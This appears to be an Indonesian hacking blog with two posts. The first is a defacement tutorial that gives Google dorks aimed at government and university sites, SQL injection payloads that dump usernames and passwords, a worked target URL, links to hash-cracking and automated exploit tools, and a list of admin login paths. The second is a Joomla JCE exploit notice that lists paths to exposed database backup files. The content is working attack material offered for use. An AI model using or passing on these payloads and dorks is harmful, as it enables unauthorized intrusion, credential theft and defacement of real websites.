Friday, December 21, 2018

Poc Bypass Admin

Ok kembali Di Blog Saya Lagi , GXTFORTEX BLOG

ok kali ini saya akan memberikan exploiter lagi dan tutorial defacenya ya kali ini saya membagikan tutorial deface poc Bypass Admin ,udh Gausah Kelamaan Langsung Simak Gan



Dork
 inurl:go.id inurl:statis- ext:html
inurl:ac.id inurl:statis- ext:html
inurl:com inurl:statis- ext:html

Exploit :

'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+


Dork 2 :

 inurl:go.id inurl:kategori- ext:html
inurl:ac.id inurl:kategori- ext:html
inurl:com inurl:kategori- ext:html

Exploit :

'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+---

Kembangin lagi ya :) biar dapet yang prawan :D ,

Contoh kalo kalian masih belum mengerti cara exploitnya ,
www.target.com/statis-1-pengantar.html maka apabila di  EXPLOIT  menjadi  :

 www.target.com/statis--1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-pengantar.html

jangan lupa , Di depan angka 1 di kasih tanda setrip " - " ( tanpa tanda petik )
klo vuln nanti di titile websitenya ada username + paswordnya , tinggal pencet CTRL + U , liat di bagian titile

Oh iya gua lupa, ini link buat hash MD5 nya di sini

https://hashkiller.co.uk/md5-decrypter.aspx


Bisa juga pake ini tools punya Indoxploit fiturnya : Lokomedia (SQL Injection) + Auto Scan Admin Login + Auto Crack Password
langsung inject otomatis , terus cari admin login , intinya simple cuma masukin www.site.com doang, klo vuln nanti muncul user + pass ( harus di hash ) + admin login . simple kan ?

ini linknya

http://tools.indoxploit.or.id/?m=tools&tools=Lokomedia_Xploiter&act=show

login admin lokomedia , atau pake tools admin finder Disini

 /redaktur
/adminweb
/administrator
/redaktur/index.php
/adminlogin
/admin
/login.php
/po-admin
/redakturweb
login@web
/adminpanel
/redaksi
admin login :
/adminweb
/admin
/login
/redaktur
/redakturweb
/administrator
/login@web
/adminpanel
/moderator
/operator
/webmaster


Ok Sekian Tutor Saya Hari Ini Dan Saya Akan Memberikan Tutor Setiap 2 hari Sekali Seputar Teknologi

Thx To Nexon Dah Kasih Tutornya
Nexon Form Lul'zSec Indo Team Dan Thx juga buat support Member Dan Admin KubuCy Team
Saya Ms.GXTFORTEX Dan Anu Saya Tn.GXTFORTEX

Terima Kasih Buat Pembaca Setia Next Tutor Bakal Ada Seru Lagi Simak Yak

Thx See U,
Posted by at No comments:

Wednesday, December 19, 2018

Joomla Exploiter

Ok Ini Artikel Pertama Saya,  GXTFORTEX BLOG<
Saya Kali Ini Akan Membahas Tentang Exploiter
Yaitu Exploiter Joomla Nah Langsung Aja Tanpa Basa Basi Gan

#################################################################################################

# Exploit Title : Joomla Content Editor Com_JCE Components 2.5.24 Database Backup Disclosure Information Vulnerability
# Author [ Discovered By ] :KingSkrupellos
# Date : 02/12/2018
# Vendor Homepage : joomlacontenteditor.net
# Software Download Links : joomlacontenteditor.net/downloads/
+ github.com/joomla/volunteers.joomla.org/tree/master/www/administrator/components/com_jce/sql
+ gitlab.dev.playkey.net/realzkh/realzkh_legacy/tree/master/administrator/components/com_jce/sql
+ JCE 2.6.33 => joomlacontenteditor.net/downloads/editor/core?task=callelement&format=raw&item_id=1353&element=
f85c494b-2b32-4109-b8c1-083cca2b7db6&method=download&args[0]=9ee3309d5768681d0360490d647c2266
+ JCE 2.5.24 => joomlacontenteditor.net/news/jce-2524-released
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.6.33 ~ 2.5.24
# Google Dorks : inurl:''/index.php?option=com_jce''
Index of /administrator/components/com_jce/sql/
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path : 

/administrator/

# Exploit : 

/administrator/components/com_jce/sql/mysql.sql

/administrator/components/com_jce/sql/postgresql.sql

/administrator/components/com_jce/sql/sqlsrv.sql

#################################################################################################


Ok Sekian Dan Terima Kasih Udah Kunjungi Blog Saya Akan Update 2 Hari Sekali Tentang Tutor Tutor Seputar Dunia Hacking Dan Pemrograman 

See You Again Pembaca Setia GXTFORTEX Blog
Saya Tn.GXTFORTEX  mengucapkan Terima Kasih Sekali lagi

OFFICIAL Team KubuCy Team
Posted by at 3 comments:
Subscribe to: Posts (Atom)